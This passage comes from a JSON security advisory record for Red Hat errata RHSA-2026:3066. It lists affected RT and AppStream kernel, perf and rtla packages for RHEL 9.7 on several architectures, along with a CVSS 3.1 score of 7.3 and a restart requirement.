"RT-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3066"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
